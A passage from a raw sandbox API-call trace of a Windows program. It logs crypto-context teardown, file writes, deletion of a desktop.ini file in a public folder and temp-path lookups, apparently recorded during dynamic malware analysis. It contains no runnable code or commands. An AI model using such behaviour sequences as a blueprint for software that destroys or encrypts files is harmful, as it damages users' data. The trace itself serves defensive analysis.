lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.348] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.348] WriteFile (in: hFile=0x520, lpBuffer=0x50e0c88*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x50e0c88*, lpNumberOfBytesWritten=0x8cf5e4*=0x180, lpOverlapped=0x0) returned 1 [0224.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.349] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0224.349] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0224.349] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0224.350] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0224.350] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0224.350] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.350] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0224.350] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.350] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0224.350] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0224.350] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0224.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab8a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0224.350] CryptDestroyKey (hKey=0x9e1c38) returned 1 [0224.350] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0224.350] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0224.350] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0224.350] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0224.350] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0224.350] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0224.350] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0224.350] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0224.350] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0224.350] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0224.351] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0224.351] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0224.351] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0224.351] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0224.351] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0224.351] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0224.351] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0224.351] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0224.351] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0224.351] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0224.351] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0224.351] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0224.351] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0224.351] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.351] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0224.351] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.351] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0224.351] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.351] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.351] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0224.351] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.351] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0224.352] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.352] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.352] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.366] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.366] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0224.366] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0224.366] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0224.366] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0224.366] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0224.366] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.366] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.366] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.366] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.366] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.366] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.366] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0224.366] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.366] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0224.366] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.366] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.366] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0224.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7160, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0224.367] CryptReleaseContext (hProv=0xa7c440, dwFlags=0x0) returned 1 [0224.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.367] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.367] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.367] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.367] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.367] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.367] FreeLibrary (hLibModule=0x76390000) returned 1 [0224.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.367] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.367] CloseHandle (hObject=0x4e0) returned 1 [0224.368] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.368] CloseHandle (hObject=0x520) returned 1 [0224.370] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.370] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.370] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\Public\\Videos\\desktop.ini", lpFilePart=0x8cedf4*="desktop.ini") returned 0x22 [0224.370] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini")) returned 0x26 [0224.370] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\desktop.ini", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x8cf060, dwReserved1=0x413764, cFileName="desktop.ini", cAlternateFileName="")) returned 0x9e2138 [0224.370] DeleteFileW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini")) returned 1 [0224.371] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x8cf060, dwReserved1=0x413764, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0224.371] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0224.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0224.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0224.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0224.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0224.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0224.372] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0224.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0224.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0224.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0224.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0224.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0224.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0224.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0224.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73760 [0224.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0224.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0224.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0224.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0224.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x29f7878 [0224.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73760 | out: hHeap=0x2af0000) returned 1 [0224.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0224.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0224.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0224.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0224.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0224.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0224.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0224.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0224.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0224.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0224.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0224.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0224.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0224.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0224.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0224.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x46) returned 0x2a5d660 [0224.373] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\Public\\Videos\\desktop.ini", lpFilePart=0x8cf650*="desktop.ini") returned 0x22 [0224.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d660 | out: hHeap=0x2af0000) returned 1 [0224.374] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini")) returned 0xffffffff [0224.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0224.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0224.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0224.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0224.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0224.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0224.374] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0224.374] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0224.374] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0224.374] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0224.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0224.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0224.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0224.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0224.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0224.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0224.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0224.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0224.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0224.375] CharUpperBuffW (in: lpsz="TempDir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0224.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0224.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0224.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab728 [0224.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0224.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0224.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab548 [0224.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0224.375] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0224.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0224.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eabe0 [0224.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0224.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0224.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0224.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0224.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0224.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0224.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0224.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0224.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0224.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 